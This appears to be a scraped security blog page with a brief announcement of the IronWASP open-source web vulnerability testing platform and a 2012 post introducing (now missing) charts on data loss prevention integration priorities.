Video Demo:

IronWASP Securitybyte Edition Released

IronWASP (Iron Web application Advanced Security testing Platform) is an open source system for web application vulnerability testing. It is designed to be customizable to the extent where users can create their own custom security scanners using it. Though an advanced user with Python/Ruby scripting expertise would be able to make full use of the platform, a lot of the tool's features are simple enough to be used by absolute beginners.

IronWASP makes use of the following excellent Free/Open Source libraries:

Monday, February 6, 2012

Implementing DLP: Integration Priorities and Components

Implementing DLP: Integration Priorities and Components:

Although it might be obvious by now, the following charts show which DLP components integrated to which existing infrastructure you need based on your priorities. I’ve broken this out into three different images to make them more readable. Why images? Because i have to dump all this into a whitepaper later and building them in a spreadsheet and taking screenshots is a lot easier than mucking the HTML formatted charts.

Between this and our priorities post and chart you should have an excellent idea of where to start and how to organize your DLP deployment.

- Rich
(0) Comments